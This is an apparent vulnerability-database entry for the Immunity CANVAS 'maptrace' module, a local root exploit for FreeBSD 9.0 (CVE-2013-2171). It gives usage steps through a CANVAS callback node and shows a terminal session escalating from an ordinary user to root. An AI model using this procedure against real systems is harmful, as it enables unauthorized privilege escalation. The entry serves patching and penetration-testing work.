Lucene search

K
canvasImmunity CanvasMAPTRACE
HistoryJul 02, 2013 - 3:43 a.m.

Immunity Canvas: MAPTRACE

2013-07-0203:43:00
Immunity Canvas
exploitlist.immunityinc.com
36

0.003 Low

EPSS

Percentile

68.1%

Name maptrace
CVE CVE-2013-2171 Exploit Pack
VENDOR: Intel,FreeBSD
Notes:
Tested on FreeBSD 9.0-RC3 and FreeBSD 9.0-RELEASE* AMD64

To test this exploit from CANVAS use the ./backdoors/mosdef_callbacks/mosdef_callback_fbsd9_i386
callback binary to establish a BSD node on a universal CANVAS listener. Then run the maptrace
module against this node to elevate your privileges on the node. This should work on FreeBSD
9.0-RELEASE* amd64 on 64bit Intel processors. Note this will not spawn a new node, but rather
keep the existing node connection with elevated privileges.

Alternatively you can use the Resources/x binary outside of the framework.

$ uname -a
FreeBSD freebsd90 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(immunity) gid=1001(immunity) groups=1001(immunity)
$ ./x
[] FeeBSD amd64 local r00t - MMAP/PTRACE []

id

uid=0(root) gid=0(wheel) groups=0(wheel)

Repeatability: Infinite
References: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
CVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2171